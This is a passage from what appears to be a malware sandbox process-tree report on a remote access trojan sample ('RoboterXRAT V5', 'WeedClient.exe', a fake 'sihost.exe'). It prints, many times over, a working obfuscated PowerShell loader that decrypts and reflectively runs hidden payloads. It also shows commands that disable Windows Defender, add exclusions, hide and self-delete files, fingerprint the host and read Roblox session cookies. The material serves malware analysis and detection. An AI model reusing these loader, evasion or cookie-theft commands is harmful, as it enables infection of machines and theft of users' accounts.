        
        C:\Windows\system32\net.exe
        
        net file
        42⤵
        
        PID:3572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        43⤵
        
        PID:3348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:6792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:2604
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        Views/modifies file attributes
        
        PID:6576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        43⤵
        
        PID:7064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:5596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:1096
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:7108
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1692
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        40⤵
        
        PID:6716
        
        C:\Windows\system32\net.exe
        
        net file
        41⤵
        
        PID:3608
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        42⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        41⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        39⤵
        
        PID:6824
        
        C:\Windows\system32\net.exe
        
        net file
        40⤵
        
        PID:7088
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        41⤵
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:6772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        38⤵
        
        PID:744
        
        C:\Windows\system32\net.exe
        
        net file
        39⤵
        
        PID:7040
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        40⤵
        
        PID:7152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:6944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        37⤵
        
        PID:6292
        
        C:\Windows\system32\net.exe
        
        net file
        38⤵
        
        PID:6984
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        39⤵
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        38⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:6560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        36⤵
        
        PID:5300
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:908
        
        C:\Windows\system32\net.exe
        
        net file
        37⤵
        
        PID:772
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        38⤵
        
        PID:6208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:5464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        35⤵
        
        PID:6968
        
        C:\Windows\system32\net.exe
        
        net file
        36⤵
        
        PID:3384
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        37⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        36⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:5236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        34⤵
        
        PID:4132
        
        C:\Windows\system32\net.exe
        
        net file
        35⤵
        
        PID:5772
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        36⤵
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        35⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:6860
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:6248
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:6452
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:6776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:3384
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        Views/modifies file attributes
        
        PID:2076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        38⤵
        
        PID:5192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
